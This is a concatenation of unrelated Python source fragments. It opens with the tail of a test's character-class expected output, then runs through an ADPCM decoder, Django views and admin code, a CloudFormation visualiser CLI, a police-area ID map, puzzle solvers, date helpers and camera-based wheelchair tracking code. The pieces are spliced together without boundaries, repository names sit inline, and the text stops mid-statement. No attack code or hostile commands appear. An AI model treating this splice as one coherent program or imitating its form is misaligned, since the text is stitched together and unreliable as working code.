S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 
S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 
S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Á S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C É S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Í S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ó S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ú S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ý S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C À S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C È S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ì S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ò S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ù S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Â S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ê S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Î S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ô S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Û S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ã S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ñ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 
0 S_WHITE_SPACE 0 C Õ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ä S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ë S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ï S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ö S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ü S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ÿ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ç S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Š S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ą S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ę S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ź S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ż S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ă S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ş S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ţ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C \\w S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 1 C ø S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ð S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ł S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 
S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C ŀ S_ALPHA_CI_AI 0 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 0 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 0 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ø S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ð S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ł S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 C Ŀ S_ALPHA_CI_AI 1 S_ALPHA_CS_AS 0 S_ALPHA_CI_AS 0 S_LOWER_CI_AI 1 S_LOWER_CS_AS 0 S_LOWER_CI_AS 0 S_UPPER_CI_AI 1 S_UPPER_CS_AS 0 S_UPPER_CI_AS 0 S_WHITE_SPACE 0 """ @pytest.mark.version('>=4.0') def test_2(act_2: Action): act_2.expected_stdout = expected_stdout_2 act_2.execute() assert act_2.clean_stdout == act_2.clean_expected_stdout import struct indexTable= [-1,-1,-1,-1,2,4,6,8] stepsizeTable = [7, 8, 9, 10, 11, 12, 13, 14, 16, 17, 19, 21, 23, 25, 28, 31, 34, 37, 41, 45, 50, 55, 60, 66, 73, 80, 88, 97, 107, 118, 130, 143, 157, 173, 190, 209, 230, 253, 279, 307, 337, 371, 408, 449, 494, 544, 598, 658, 724, 796, 876, 963, 1060, 1166, 1282, 1411, 1552, 1707, 1878, 2066, 2272, 2499, 2749, 3024, 3327, 3660, 4026, 4428, 4871, 5358, 5894, 6484, 7132, 7845, 8630, 9493, 10442, 11487, 12635, 13899, 15289, 16818, 18500, 20350, 22385, 24623, 27086, 29794, 32767] index = 0 cur_sample = 0 #input code 4bit, return output 16 bit sample def adpcm2pcm(code): global index global cur_sample global indexTable global stepsizeTable if ((code & 8) != 0): fg = 1 else: fg = 0 code &= 7 diff = int((stepsizeTable[index]*code/4) + stepsizeTable[index]/8) if fg: diff = -diff cur_sample += diff #check overflow if cur_sample > 32767: cur_sample = 32767 elif cur_sample < -32768: cur_sample = -32768 index += indexTable[code] # check overflow if index < 0: index = 0 elif index > 88: index = 88 return struct.pack('h',cur_sample) if __name__ == '__main__': try: f = open('adpcm','rb') s = open('pcm','wb') tmp = f.read(1) while tmp: sample=ord(tmp) #transfer to int high_bit = sample >> 4 low_bit = (high_bit << 4)^sample s.write(adpcm2pcm(high_bit)) s.write(adpcm2pcm(low_bit)) tmp = f.read(1) f.close() s.close() except: print("fail") print("done")from django.conf import settings from django.contrib import messages from django.http import HttpResponseRedirect from django.shortcuts import render from .forms import EmailSignupForm from .models import EmailSignup def email_list_signup(request): form = EmailSignupForm(request.POST or None) if request.method == "POST": if form.is_valid(): email_signup_qs = EmailSignup.objects.filter(email=form.instance.email) if email_signup_qs.exists(): messages.info(request, "You are already subscribed") else: form.save() messages.success(request, "You are successfully subscribed") return HttpResponseRedirect(request.META.get('HTTP_REFERER')) import sys sys.modules['custom_exceptions'] = __import__('mock_custom_exceptions') sys.modules['utility'] = __import__('mock_utility') sys.modules['constants'] = __import__('mock_constants')import numpy from aspectizing import any_callable, aspect, woody_logger aspect(numpy, any_callable, "", woody_logger, dry_run=True) cloud_formation_viz/main.py #!/usr/bin/env python import sys import click from .parser import cfn_parser from 
.render import write_output @click.command() @click.argument("input", type=click.File("r"), default=sys.stdin) @click.argument('output', type=click.File('w'), default=sys.stdout) @click.option('--unique-edges/--no-unique-edges', default=True) @click.option('--parameters/--no-parameters', default=True) @click.option('--outputs/--no-outputs', default=True) @click.option('--pseudo/--no-pseudo', default=True) @click.option('--globals/--no-globals', default=True) @click.option("--icons-path", type=click.Path(exists=True)) @click.version_option(message='Visualise AWS Cloudformation Templates, Version %(version)s') @click.pass_context def main(ctx, **kwargs): """ INPUT input filename [default: stdin] OUTPUT output filename [default: stdout] """ input_file = kwargs.pop('input') output_file = kwargs.pop('output') parameters_bool = kwargs.pop('parameters') outputs_bool = kwargs.pop('outputs') pseudo_bool = kwargs.pop('pseudo') globals_bool = kwargs.pop('globals') unique_edges_bool = kwargs.pop('unique_edges') icons_path = kwargs.pop('icons_path') if input_file.name == "" and sys.stdin.isatty(): click.echo(ctx.get_help()) ctx.exit() try: cfn_parser_obj = cfn_parser( parameters_bool, outputs_bool, pseudo_bool, globals_bool ) graph = cfn_parser_obj.read_input(input_file) except Exception as e: raise click.ClickException("{}".format(e)) try: write_output(output_file, graph, unique_edges_bool, icons_path) except Exception as e: raise click.ClickException("{}".format(e)) if __name__ == '__main__': main() 0 area_ids = { 'Central': 1, 'Rampart': 2, 'Southwest': 3, 'Hollenbeck': 4, 'Harbor': 5, 'Hollywood': 6, 'Wilshire': 7, 'West LA': 8, 'Van Nuys': 9, 'West Valley': 10, 'Northeast': 11, '77th Street': 12, 'Newton': 13, 'Pacific': 14, 'N Hollywood': 15, 'Foothill': 16, 'Devonshire': 17, 'Southeast': 18, 'Mission': 19, 'Olympic': 20, 'Topanga': 21, } swcide/algorithm input = [3, 5, 2, 3, 4, 6, 1, 2, 4] def find_max_num(array): a = max(array) for i in array: for j in array: ''' i의 값이 j보다 작다면 break j의 값이 더 크다면 계속해 반복. for else. if 문 안의 값이 break가 아닐 시 else를 출력함. 
''' if i < j: print(i, ": i", j, ":j") ''' 3 : i 5 :j 5 : i 6 :j 2 : i 3 :j 3 : i 5 :j 4 : i 5 :j ''' break else: print(i, "else") return i result = find_max_num(input) print(result) with open('input.txt') as file: code = [line.strip() for line in file] open_tags = ['(', '[', '{', '<'] close_tags = [')', ']', '}', '>'] incomplete_lines = [] def find_incomplete_lines(): for line in code: modified_line = line finished = False while not finished: end_or_modified = False for i in range(len(modified_line)): if i == len(modified_line) - 1: # missing character(s) incomplete_lines.append(line) end_or_modified = True finished = True break if modified_line[i] in open_tags and modified_line[i + 1] in close_tags: for t in range(4): if modified_line[i] == open_tags[t] and modified_line[i + 1] == close_tags[t]: modified_line = modified_line[:i] + modified_line[i + 2:] end_or_modified = True break if t == 3: # illegal character end_or_modified = True finished = True break if end_or_modified: break find_incomplete_lines() unclosed_line_tags = [] def remove_legal_pairs(): for line in incomplete_lines: finished = False while not finished: for i in range(len(line)): end_or_modified = False if i != len(line) - 1: if line[i] in open_tags and line[i + 1] in close_tags: for t in range(4): if line[i] == open_tags[t] and line[i + 1] == close_tags[t]: line = line[:i] + line[i + 2:] end_or_modified = True break else: # end of line unclosed_line_tags.append(line) finished = True end_or_modified = True if end_or_modified: break remove_legal_pairs() scores = [] def calc_scores(): for line in unclosed_line_tags: score = 0 for opening_tag in reversed(list(line)): for t in range(4): if open_tags[t] == opening_tag: score *= 5 score += (t + 1) break scores.append(score) calc_scores() scores.sort() print(scores[int((len(scores)/2))]) ''' local_functions.py module repository of functions used throught the application ''' from datetime import date, timedelta def date_path_concat(y, m, d): '''concat date tuple to 'y_m_d' format ''' return str(y)+'_'+str(m).zfill(2)+'_'+str(d).zfill(2) def date_to_int(y, m, d): '''return date tuple from string tuple ''' return int(str(y)+str(m).zfill(2)+str(d).zfill(2)) def date_add_day(y, m, d, dif): '''return new date tuple from old date tuple + dif ''' d = date(y, m, d) n = d + timedelta(days=dif) return (n.year, n.month, n.day) akashdraut/btre_project0 from django.contrib import admin from .models import Realtor class RealtorAdmin(admin.ModelAdmin): """ To show the required fields on admin panel """ list_display = ('id', 'name', 'email') # To display field names list_display_links = ('id', 'name') # To make clickable links search_fields = ('name',) # Searchable fields list_per_page = 25 # Fot listing per page admin.site.register(Realtor, RealtorAdmin) import numpy as np import cv2 import cv2.aruco as aruco import pyrealsense2 as rs import copy import threading from datetime import datetime import sys, time from threading import Timer import math #from numpy import cross, eye, dot from scipy.linalg import expm, norm diff_w = np.asarray([0.01,-0.085,-0.1]) def M(axis, theta): return expm(np.cross(np.eye(3), axis/norm(axis)*theta)) class Wheelchair(): def __init__(self): #To do: change num1, num2 to a list of num self.aruco_num1 = 0 self.aruco_num2 = 12 self.in_camera = False self.num_xyz = {'num1': None , 'num2': None } def wheelchair_dec(self,ids,corners,depth_img): num = int(len(ids)) for id in range(num): if ids[id] == self.aruco_num1: self.num_xyz['num1'] = get_xyz(corners[id], depth_img) 
self.in_camera = True if ids[id] == self.aruco_num2: self.num_xyz['num2'] = get_xyz(corners[id], depth_img) #self.in_camera = True #if self.num_xyz['num1'] != None and self.num_xyz['num2'] != None : #print(self.num_xyz['num1'],self.num_xyz['num2']) def unit_vector(vector): """ Returns the unit vector of the vector.""" return vector / np.linalg.norm(vector) def angle_between(v1, v2): """Finds angle between two vectors""" v1_u = unit_vector(v1) v2_u = unit_vector(v2) return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0)) def rotation_matrix(axis, theta): """ Return the rotation matrix associated with counterclockwise rotation about the given axis by theta radians. """ print("rotation_matrix 